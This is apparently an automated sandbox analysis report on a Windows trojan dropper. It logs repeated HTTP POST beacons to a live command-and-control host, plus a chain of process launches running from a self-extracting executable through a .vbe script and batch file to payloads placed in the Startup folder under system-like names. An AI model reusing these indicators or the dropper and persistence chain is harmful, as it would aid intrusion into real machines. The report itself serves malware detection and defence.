                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1412Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1412Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1412Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global trafficDNS traffic detected: DNS query: 304550cm.n9shka.top
                                    Source: unknownHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.0000000003385000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://304550cm.n9P:
                                    Source: COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.0000000003385000.00000004.00000800.00020000.00000000.sdmp, COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.00000000031FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://304550cm.n9shka.top
                                    Source: COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.0000000002F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://304550cm.n9shka.top/
                                    Source: COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.0000000003194000.00000004.00000800.00020000.00000000.sdmp, COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.0000000003213000.00000004.00000800.00020000.00000000.sdmp, COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.0000000002F22000.00000004.00000800.00020000.00000000.sdmp, COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.00000000030E8000.00000004.00000800.00020000.00000000.sdmp, COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.0000000003385000.00000004.00000800.00020000.00000000.sdmp, COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.00000000031FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://304550cm.n9shka.top/jspollgamesqldle.php
                                    Source: hostcrt.exe, 00000004.00000002.1793730163.0000000003108000.00000004.00000800.00020000.00000000.sdmp, COBPewMCbcSeQUSyEIOt.exe, 0000000B.00000002.4164385410.0000000003071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                                    System Summary

                                    barindex
                                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CC6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00CC6FAA
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Windows\Media\Characters\conhost.exeJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Windows\Media\Characters\088424020bedd6Jump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CC848E0_2_00CC848E
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CC40FE0_2_00CC40FE
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CD40880_2_00CD4088
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CD00B70_2_00CD00B7
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CE51C90_2_00CE51C9
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CD71530_2_00CD7153
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CD62CA0_2_00CD62CA
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CC32F70_2_00CC32F7
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CD43BF0_2_00CD43BF
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CED4400_2_00CED440
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CCF4610_2_00CCF461
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CCC4260_2_00CCC426
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CD77EF0_2_00CD77EF
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CED8EE0_2_00CED8EE
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CC286B0_2_00CC286B
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CF19F40_2_00CF19F4
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CCE9B70_2_00CCE9B7
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CD6CDC0_2_00CD6CDC
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CD3E0B0_2_00CD3E0B
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CCEFE20_2_00CCEFE2
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CE4F9A0_2_00CE4F9A
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeCode function: 4_2_00007FFD9BAC0D734_2_00007FFD9BAC0D73
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeCode function: 4_2_00007FFD9BC753024_2_00007FFD9BC75302
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeCode function: 4_2_00007FFD9BC749784_2_00007FFD9BC74978
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeCode function: 4_2_00007FFD9BC741854_2_00007FFD9BC74185
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeCode function: 4_2_00007FFD9BC730FA4_2_00007FFD9BC730FA
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeCode function: 4_2_00007FFD9BC600FE4_2_00007FFD9BC600FE
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeCode function: 4_2_00007FFD9BC7205D4_2_00007FFD9BC7205D
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeCode function: 4_2_00007FFD9BC737FA4_2_00007FFD9BC737FA
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeCode function: 4_2_00007FFD9BC74E384_2_00007FFD9BC74E38
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeCode function: 4_2_00007FFD9C1C6A504_2_00007FFD9C1C6A50
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeCode function: 11_2_00007FFD9BAD0D7311_2_00007FFD9BAD0D73
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeCode function: 11_2_00007FFD9BC843FC11_2_00007FFD9BC843FC
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeCode function: 11_2_00007FFD9BC832D011_2_00007FFD9BC832D0
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeCode function: 11_2_00007FFD9BC839FF11_2_00007FFD9BC839FF
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeCode function: 11_2_00007FFD9BC8498011_2_00007FFD9BC84980
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeCode function: 11_2_00007FFD9BC700FE11_2_00007FFD9BC700FE
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeCode function: 11_2_00007FFD9BC8576811_2_00007FFD9BC85768
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeCode function: 11_2_00007FFD9BC836FA11_2_00007FFD9BC836FA
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeCode function: 11_2_00007FFD9BC84E6011_2_00007FFD9BC84E60
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeCode function: 11_2_00007FFD9BC8558C11_2_00007FFD9BC8558C
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeCode function: 11_2_00007FFD9BC824C011_2_00007FFD9BC824C0
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeCode function: 11_2_00007FFD9C1D2B7A11_2_00007FFD9C1D2B7A
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeCode function: 11_2_00007FFD9C1D6A5011_2_00007FFD9C1D6A50
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeCode function: 17_2_00007FFD9BAA0D7317_2_00007FFD9BAA0D73
                                    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\AfbbeRiC.log 80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: String function: 00CDEC50 appears 56 times
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: String function: 00CDEB78 appears 39 times
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: String function: 00CDF5F0 appears 31 times
                                    Source: kIdT4m0aa4.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs kIdT4m0aa4.exe
                                    Source: kIdT4m0aa4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: classification engineClassification label: mal100.troj.adwa.evad.winEXE@20/72@1/1
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CC6C74 GetLastError,FormatMessageW,0_2_00CC6C74
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CDA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00CDA6C2
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\Desktop\IQRzjLYS.logJump to behavior
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ffe580e3842ee6cf92d74a6cb048881c30039e64977359bda0dcef15e9441fa1
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6560:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6008:120:WilError_03
                                    Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1368:120:WilError_03
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeFile created: C:\Users\user\AppData\Local\Temp\g3XcAN3ZvuJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProviderWebSavesNet\4m3MAufDe8UYuW2ydRhKZQEREfiJBHvyHq5AIcSjywzlT6BxOyJV1br81hHR.bat" "
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCommand line argument: sfxname0_2_00CDDF1E
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCommand line argument: sfxstime0_2_00CDDF1E
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCommand line argument: STARTDLG0_2_00CDDF1E
                                    Source: kIdT4m0aa4.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: kIdT4m0aa4.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeFile read: C:\Windows\win.iniJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeFile read: C:\Users\user\Desktop\kIdT4m0aa4.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\kIdT4m0aa4.exe "C:\Users\user\Desktop\kIdT4m0aa4.exe"
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProviderWebSavesNet\KzpapvVcbVWl7x3kYPCfes0ojKXptfYw4GAjwTs.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProviderWebSavesNet\4m3MAufDe8UYuW2ydRhKZQEREfiJBHvyHq5AIcSjywzlT6BxOyJV1br81hHR.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProviderWebSavesNet\hostcrt.exe "C:\ProviderWebSavesNet/hostcrt.exe"
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4sBxboqxXs.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe "C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe"
                                    Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
                                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe"
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProviderWebSavesNet\KzpapvVcbVWl7x3kYPCfes0ojKXptfYw4GAjwTs.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProviderWebSavesNet\4m3MAufDe8UYuW2ydRhKZQEREfiJBHvyHq5AIcSjywzlT6BxOyJV1br81hHR.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProviderWebSavesNet\hostcrt.exe "C:\ProviderWebSavesNet/hostcrt.exe"Jump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4sBxboqxXs.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe "C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe" Jump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: dxgidebug.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
